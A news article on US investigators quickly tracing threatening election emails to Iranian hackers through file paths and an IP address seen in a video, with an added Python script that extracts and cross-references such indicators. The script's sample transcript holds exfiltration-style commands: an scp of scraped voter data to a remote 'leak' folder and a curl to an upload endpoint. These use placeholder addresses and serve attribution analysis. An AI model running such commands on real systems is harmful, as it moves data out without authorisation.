US caught Iranian hackers through 'dumb mistake'
US government analysts and private sector investigators caught Iranian hackers behind a wave of thousands of emails threatening US voters to "vote Trump or else" exceptionally fast because of amateur mistakes made in a video attached to some of the emails.
Four people familiar with the matter told Reuters that the hackers, who are not necessarily working with the Iranian government, were linked to the malicious cyber operation within days, something that usually requires months of technical analysis and supporting intelligence.
“Either they made a dumb mistake or wanted to get caught,” said an anonymous senior US government official. “We are not concerned about this activity being some kind of false flag due to other supporting evidence. This was Iran.”
The hackers tried to blur their identity but were unable to hide all of the incriminating information, the sources said.
The video showed the hackers’ computer screen as they typed in commands and pretended to hack a voter registration system. Investigators noticed snippets of revealing computer code, including file paths, file names and an IP address.
According to the sources, security analysts found that the IP address, hosted through an online service called Worldstream, traced back to previous hacking activity from Iran.
Analysts then cross-referenced those clues left in the video with data from other intelligence streams, including communications interceptions, the government official said.
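The leak described above is a routine operational-security failure: anything visible on a recorded screen (typed commands, prompts, file paths, host names, addresses) becomes an indicator an analyst can harvest and pivot on. The script below is an added illustration of that workflow, not code from the article, from Reuters or from the investigators. It takes a constructed transcript of the kind of text that would be read off the frames of such a recording, extracts Windows and Unix file paths, file names and IPv4 addresses, discards addresses that could never identify a remote host (RFC 1918, loopback, link-local), and cross-references the remaining ones against a constructed table standing in for the prior-activity data the analysts matched the IP against. The transcript, the IP addresses (taken from the RFC 5737 documentation ranges), the provider and campaign labels, and the file-extension list are all placeholders chosen for the example; none of them come from the real video or the real investigation.

```python
"""Added example, not code from the article or from the investigators:
pull pivotable indicators (file paths, file names, IP addresses) out of the
transcribed text of a screen recording and cross-reference the routable IPs
against a local table of previously attributed infrastructure.
"""
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed sample of what an analyst might transcribe or OCR from the frames
# of a recording in which an operator types commands. None of it is from the
# real video; the IPs are taken from the RFC 5737 documentation ranges.
SCREEN_TEXT = r"""
C:\Users\operator\Desktop\voter_tool\run.bat
python C:\tools\scrape\targets.py --out results_va.csv
ssh root@192.0.2.45
scp results_va.csv root@192.0.2.45:/opt/www/leak/
ping 10.0.0.1
curl http://203.0.113.7/upload.php
"""

# Constructed stand-in for the threat-intelligence data the analysts pivoted on.
# Provider and campaign names are placeholders, not real attribution data.
KNOWN_INFRA = {
    "192.0.2.45": {"provider": "hoster-A", "campaign": "prior-op-1"},
}

WIN_PATH = re.compile(r"[A-Za-z]:\\(?:[^\\\s]+\\)*[^\\\s]*")
# A leading "/" that is not part of a URL ("://") or a longer path.
UNIX_PATH = re.compile(r"(?<![\w./])/(?:[\w.-]+/)+[\w.-]*")
# Loose on purpose; invalid octets are rejected by ipaddress below.
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Bare file names; the extension list is an illustrative subset.
FILENAME = re.compile(r"\b[\w-]+\.(?:bat|py|csv|php|sh|ps1|exe|zip|txt)\b")

# Ranges that cannot be pivoted on because they never identify a remote host.
# This deliberately does not use IPv4Address.is_global, which would also
# reject the RFC 5737 documentation addresses used as stand-ins above.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8", "224.0.0.0/4",
)]


@dataclass
class Indicators:
    paths: list = field(default_factory=list)
    filenames: list = field(default_factory=list)
    routable_ips: list = field(default_factory=list)
    local_ips: list = field(default_factory=list)


def _dedupe(items):
    """Drop repeats while keeping first-seen order."""
    seen = set()
    return [x for x in items if not (x in seen or seen.add(x))]


def is_routable(ip: str) -> bool:
    """True if the address could identify a remote host worth pivoting on."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:  # e.g. "999.1.1.1" slipped through the loose regex
        return False
    return not any(addr in net for net in NON_ROUTABLE)


def extract_indicators(text: str) -> Indicators:
    """Harvest paths, file names and IPs from transcribed screen text."""
    ind = Indicators()
    ind.paths = _dedupe(WIN_PATH.findall(text) + UNIX_PATH.findall(text))
    ind.filenames = _dedupe(FILENAME.findall(text))
    for ip in _dedupe(IPV4.findall(text)):
        (ind.routable_ips if is_routable(ip) else ind.local_ips).append(ip)
    return ind


def pivot(ind: Indicators, known: dict) -> list:
    """Return the routable IPs that also appear in prior attributed activity."""
    return [{"ip": ip, **known[ip]} for ip in ind.routable_ips if ip in known]


if __name__ == "__main__":
    found = extract_indicators(SCREEN_TEXT)
    print("paths:", found.paths)
    print("filenames:", found.filenames)
    print("routable IPs:", found.routable_ips, "local:", found.local_ips)
    for hit in pivot(found, KNOWN_INFRA):
        print("pivot:", hit)
```

Two design points matter in practice. Local and private addresses are kept rather than thrown away, because a username, a home-directory name or an internal host numbering scheme can still corroborate an attribution even though it cannot be looked up in hosting records. And the pivot step is only as good as the prior-activity data behind it; the article's investigators matched the address against earlier activity from Iran and then against separate intelligence streams, which is the cross-referencing a single hit like this one does not replace.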
“This public disclosure of attribution to Iran by the government has been done with breakneck speed, compared to the usual process that takes months and often years,” said Dmitri Alperovitch, a co-founder and former CTO of cybersecurity company CrowdStrike.
On Wednesday, US Director of National Intelligence John Ratcliffe said Russia and Iran have both tried to interfere in the campaign for the upcoming US elections.
While the emails, which demanded that recipients support the Republican Party and vote for President Donald Trump or “we will come after you,” appeared to come from an official-looking Proud Boys email address, the address was inauthentic, security analysts said. The Proud Boys denied they were behind the messages.
The United States on Thursday slapped new sanctions on five Iranian entities for what it called "brazen attempts" to interfere with the US election.
Stepping up pressure after US intelligence pointed the finger at both Iran and Russia, the Treasury Department accused the Iranian groups of seeking to spread disinformation and division ahead of the November 3 vote.
The Treasury imposed the fresh sanctions against the Islamic Revolutionary Guard Corps (IRGC), the IRGC-Quds Force, the Bayan Rasaneh Gostar Institute, the Iranian Islamic Radio and Television Union and International Union of Virtual Media.
The groups have worked to "sow discord among the voting populace by spreading disinformation online and executing malign influence operations aimed at misleading US voters," the Treasury said.